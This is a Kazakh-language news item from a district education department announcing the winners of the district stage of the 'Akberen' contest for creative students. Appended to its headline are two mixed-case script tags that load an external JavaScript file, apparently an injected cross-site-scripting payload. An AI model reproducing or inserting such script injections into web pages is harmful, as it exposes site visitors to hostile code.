Шығармашыл оқушылар арасындағы «Ақберен » республикалық байқауының аудандық кезеңі<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

04.10.2023

2023 жылғы 4 қазан күні Целиноград ауданы  бойынша білім бөлімінің ұйымдастыруымен «Қажымұқан ауылының жалпы орта білім беретін мектебі» КММ шығармашыл оқушылар арасындағы «Ақберен » республикалық байқауының аудандық кезеңі өтті. Байқауға 6 номинация бойынша ауыл мектептерінен 78 оқушы қатысты. Байқау қорытындысы бойынша облыстық кезеңге төмендегі оқушылар жолдама алды:
1. «Шешендік,білгірлік» сайысы номинациясы бойынша І дәрежелі диплом Тасты ауылы орта мектебінің 11 сынып оқушысы  Кенжебек Гүлжан;
2. «Көркем сөз» номинациясы бойынша І дәрежелі диплом Қызылжар ауылы орта мектебінің 11 сынып оқушысы  Хусейнов Айболат;

3. «Эссе жазу» номинациясы бойынша І дәрежелі диплом Қоянды ауылы №2 орта мекебінің 11 сынып оқушысы Атамбай Гүлнұр

4. «Ұлттық аспапта өнер көрсету» номинациясы бойынша І дәрежелі диплом Қажымұқан ауылы орта мектебінің 9 сынып оқушысы Айсина Айша ;

5. «Ақындар айтысы» номинациясы бойынша І дәрежелі диплом Қоянды ауылы №1 орта мектебінің 10 сынып оқушысы Съездұлы Нұрсұлтан;
6. «Ақындар мүшәйрасы» номинациясы бойынша І дәрежелі диплом Талапкер ауылы орта мектебінің оқушысы Мұхамедқали Нұрбек.

Алдағы облыстық кезеңде оқушыларымызға сәттілік тілейміз.

Просмотров: 2240


Пікір қосу



Деректерді қолтаңбаға қосу